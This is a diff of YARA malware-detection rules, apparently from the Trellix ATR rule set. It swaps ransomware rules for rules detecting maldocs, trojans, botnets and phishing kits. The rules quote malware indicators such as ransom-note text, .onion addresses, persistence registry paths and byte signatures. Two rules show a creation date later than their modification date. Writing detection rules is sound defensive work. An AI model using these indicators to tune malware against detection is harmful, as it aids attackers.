-		$oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
-		$oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 }
-		$oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b }
-		$ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 }
-		$ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
-		$ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c }
-		$oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 }
-		$oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba }
-		$oy0 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oy1 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oy2 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 }
-		$oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 }
+		$pdb = "\\svn\\sys\\binary\\i386\\agony.pdb"
+		$pdb1 = "\\Windows\\i386\\ndisdrv.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB ) and ( $s1 and all of ( $op* ) ) or ( $pdb and all of ( $oj* ) ) or ( $t1 and all of ( $ok* ) ) or ( $random and all of ( $oi* ) ) or ( $random and all of ( $ou* ) ) or ( $random and all of ( $oa* ) and $ou0 ) or ( $random and all of ( $oy* ) ) or ( $random and all of ( $oh* ) ) or ( $random and $ou0 ) or ( $random and $oi1 )
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and any of them
 }
-
-rule TRELLIX_ARC_Ransom_Avoslocker : FILE
+rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE
 {
 	meta:
-		description = "Rule to detect Avoslocker Ransomware"
-		author = "CB @ ATR"
-		id = "50f029c8-154e-583d-8264-8d86d01075f6"
-		date = "2021-07-22"
-		modified = "2021-07-22"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Avoslocker.yar#L3-L27"
+		description = "Rule to detect the RTF files created to distribute BlueTea trojan"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab"
+		date = "2020-04-21"
+		modified = "2020-08-14"
+		reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3"
+		hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277"
+		logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		Version = "v1"
-		DetectionName = "Ransom_Win_Avoslocker"
-		hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f"
-		hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856"
+		tags = "MALDOC, FILE"
+		rule_version = "v1"
+		malware_type = "maldoc"
+		malware_family = "Maldoc:W32/BlueTea"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii
-		$v2 = "CryptStringToBinary failed. Err: %d" fullword ascii
-		$v3 = "encrypting %ls failed" fullword wide
-		$v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii
-		$v5 = "operator co_await" fullword ascii
-		$v6 = "drive %s took %f seconds" fullword ascii
-		$seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff }
-		$seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 }
-		$seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff }
+		$sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and pe.imphash ( ) == "a24c2b5bf84a5465eb75f1e6aa8c1eec" and ( 5 of them ) and all of ( $seq* ) ) or ( all of them )
+		uint16( 0 ) == 0x5c7b and filesize < 100KB and all of them
 }
-
-rule TRELLIX_ARC_Megacortex_Signed : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Medfos : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect MegaCortex samples digitally signed"
+		description = "Rule to detect Medfos trojan based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "78a74e30-4de0-5e63-8ca5-31251c296f98"
-		date = "2025-06-01"
+		id = "07ad0227-ca8f-5071-8ef7-8c3e087fcc35"
+		date = "2013-04-19"
 		modified = "2020-08-14"
-		reference = "https://blog.malwarebytes.com/detections/ransom-megacortex/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MegaCortex.yar#L3-L26"
+		reference = "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=win32%2Fmedfos"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_medfos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8ffced3aca837682fbd7ee68f559f73b8299cbfbe198f48124c4857680735249"
+		hash = "3582e242f62598445ca297c389cae532613afccf48b16e9c1dcf1bfedaa6e14f"
+		logic_hash = "1726462a806f5cb3f0b80596623cebc51a7a9f866ded0cb59ea1c43034ce2819"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/MegaCortex"
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Medfos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
+	strings:
+		$pdb = "\\som\\bytguqne\\jzexsaf\\gyin.pdb"
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=GB/L=ROMFORD/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" and pe.signatures [ i ] . serial == "53:cc:4c:69:e5:6a:7d:bc:36:67:d5:ff:d5:24:aa:4b" or pe.signatures [ i ] . subject contains "/C=GB/postalCode=RM6 4DE/ST=ROMFORD/L=ROMFORD/street=8 Quarles Park Road/O=3AN LIMITED/CN=3AN LIMITED" or pe.signatures [ i ] . serial == "00:ad:72:9a:65:f1:78:47:ac:b8:f8:49:6a:76:80:ff:1e" )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE
+rule TRELLIX_ARC_Kelihos_Botnet_Pdb : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect the unpacked Makop ransomware samples"
+		description = "Rule to detect Kelihos malware based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "2828f2f9-4702-5cef-8b4e-7e98146c0332"
-		date = "2020-07-19"
+		id = "2b6683a1-ba19-586b-8a92-89d4764efa12"
+		date = "2013-09-04"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_makop.yar#L1-L32"
+		reference = "https://www.malwaretech.com/2017/04/the-kelihos-botnet.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_kelhios_botnet_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1"
-		logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4"
+		hash = "f0a6d09b5f6dbe93a4cf02e120a846073da2afb09604b7c9c12b2e162dfe7090"
+		logic_hash = "f60fb85161f86653f390b444d568da24cf07b3be99856230156741e8451e2a3f"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Makop"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Kelihos"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? }
-		$pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c }
-		$pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? }
-		$pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 }
-		$pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 }
-		$pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 }
-		$pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 }
-		$pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 }
-		$pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? }
-		$pattern_9 = { 85c0 7407 50 ff15???????? }
+		$pdb = "\\Only\\Must\\Not\\And.pdb"
+		$pdb1 = "\\To\\Access\\Do.pdb"
 
 	condition:
-		7 of them and filesize < 237568
+		uint16( 0 ) == 0x5a4d and filesize < 1440KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE
 {
 	meta:
-		description = "Detecting variants of Windows BlackCat malware"
-		author = " Trellix ATR"
-		id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98"
-		date = "2022-01-06"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24"
+		description = "Rule to detect inabot worm based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b899d2d6-000a-5363-9efe-527dcd0cea17"
+		date = "2013-04-19"
+		modified = "2020-08-14"
+		reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_inabot_worm_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3"
+		hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa"
+		logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "Ransomware"
-		detection_name = "Ransom_Win_BlackCat"
+		tags = "WORM, FILE"
+		rule_version = "v1"
+		malware_type = "worm"
+		malware_family = "Worm:W32/Inabot"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
-		$URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
-		$API = { 3a 7c d8 3f }
+		$pdb = "\\trasser\\portland.pdb"
+		$pdb1 = "\\mainstream\\archive.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3500KB and 1 of ( $URL* ) and $API
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE
+rule TRELLIX_ARC_Jatboss : PHISHING FILE
 {
 	meta:
-		description = "Ransomware encrypting Mongo Databases "
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "4350a874-dd76-5379-af9f-f1d190385706"
-		date = "2019-04-25"
+		description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85"
+		date = "2019-12-04"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MONGOLOCK.yar#L1-L41"
+		reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_jatboss.yar#L1-L36"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984"
+		hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb"
+		logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc"
 		score = 75
-		quality = 70
-		tags = "RANSOMWARE, FILE"
+		quality = 66
+		tags = "PHISHING, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/MongLock"
+		malware_type = "phishing"
+		malware_family = "Phishing:W32/Jatboss"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8"
 
 	strings:
-		$x1 = "C:\\Windows\\system32\\cmd.exe" fullword wide
-		$s1 = "and a Proof of Payment together will be ignored. We will drop the backup after 24 hours. You are welcome! " fullword ascii
-		$s2 = "Your File and DataBase is downloaded and backed up on our secured servers. To recover your lost data : Send 0.1 BTC to our BitCoin" ascii
-		$s3 = "No valid port number in connect to host string (%s)" fullword ascii
-		$s4 = "SOCKS4%s: connecting to HTTP proxy %s port %d" fullword ascii
-		$s5 = "# https://curl.haxx.se/docs/http-cookies.html" fullword ascii
-		$s6 = "Connection closure while negotiating auth (HTTP 1.0?)" fullword ascii
-		$s7 = "detail may be available in the Windows System event log." fullword ascii
-		$s8 = "Found bundle for host %s: %p [%s]" fullword ascii
-		$s9 = "No valid port number in proxy string (%s)" fullword ascii
-		$op0 = { 50 8d 85 78 f6 ff ff 50 ff b5 70 f6 ff ff ff 15 }
-		$op1 = { 83 fb 01 75 45 83 7e 14 08 72 34 8b 0e 66 8b 45 }
-		$op2 = { c7 41 0c df ff ff ff c7 41 10 }
+		$jat = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
+		$jatboss = { 3C 3C 2F 41 75 74 68 6F 72 28 4A 41 54 29 20 2F 43 72 65 61 74 6F 72 28 }
+		$spam = { 54 00 68 00 69 00 73 00 20 00 65 00 2D 00 6D 00 61 00 69 00 6C 00 20 00 61 00 6E 00 64 00 20 00 61 00 6E 00 79 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 6D 00 65 00 6E 00 74 00 20 00 61 00 72 00 65 00 20 00 43 00 6F 00 6E 00 66 00 69 00 64 00 65 00 6E 00 74 00 69 00 61 00 6C 00 2E 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5025 and filesize < 1000KB and ( $jat or $jatboss ) ) or ( uint16( 0 ) == 0xcfd0 and $spam and any of ( $jat* ) )
 }
-rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Msworldexploit_Builder_Doc : MALDOC FILE
 {
 	meta:
-		description = "Rule to detect the Termite Ransomware"
-		author = "McAfee ATR Team"
-		id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca"
-		date = "2018-08-28"
-		modified = "2020-10-12"
-		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_termite.yar#L1-L32"
+		description = "Rule to detect RTF/Docs files created by MsWordExploit Builder"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "6c4c091b-5fce-583a-bc17-31830251892c"
+		date = "2025-06-01"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_MsWordExploit_DOC.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133"
-		logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968"
+		logic_hash = "f85c6d79e5ed20084d35f9de92a9d9ce20cf4b3100b1226d64147e366934585d"
 		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Termite"
+		quality = 68
+		tags = "MALDOC, FILE"
+		malware_type = "maldoc"
+		malware_family = "Maldoc:W32/MSwordExploit"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii
-		$s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii
-		$s5 = "C:\\Windows\\Termite.exe" fullword ascii
-		$s6 = "\\Shell\\Open\\Command\\" fullword ascii
-		$s7 = "t314.520@qq.com" fullword ascii
-		$s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
+		$s1 = { 68 74 74 70 3A 2F 2F 61 70 69 2E 6D 73 77 6F 72 64 65 78 70 6C 6F 69 74 2E 63 6F 6D }
+		$s2 = "{\\*\\generator mswordexploit 6.3.9600}" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB ) and all of them
+		uint16( 0 ) == 0x3030 and filesize < 4000KB and any of them
 }
-rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Cutwail_Pdb : BOTNET FILE
 {
 	meta:
-		description = "Rule to detect the Kraken Cryptor Ransomware loader"
+		description = "Rule to detect cutwail based on the PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11"
-		date = "2018-09-30"
+		id = "62058ff9-acb5-5f71-b6bb-4c64e51442ba"
+		date = "2008-04-16"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L1-L30"
+		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/CUTWAIL"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cutwail.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
-		logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539"
+		hash = "d702f823eefb50d9ea5b336c638f65a40c2342f8eb88278da60aa8a498c75010"
+		logic_hash = "f53626e6085509ddf9268b69e54a138e64cd5d3fbad119e6e9473179decd7927"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BOTNET, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Kraken"
+		malware_type = "botnet"
+		malware_family = "Botnet:W32/Cutwail"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii
-		$s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
-		$s3 = "public_key" fullword ascii
-		$s4 = "KRAKEN DECRYPTOR" ascii
-		$s5 = "UNIQUE KEY" fullword ascii
+		$pdb = "\\0bulknet\\FLASH\\Release\\flashldr.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and $pdb or all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 440KB and any of them
 }
-rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Alina_POS_PDB : POS FILE
 {
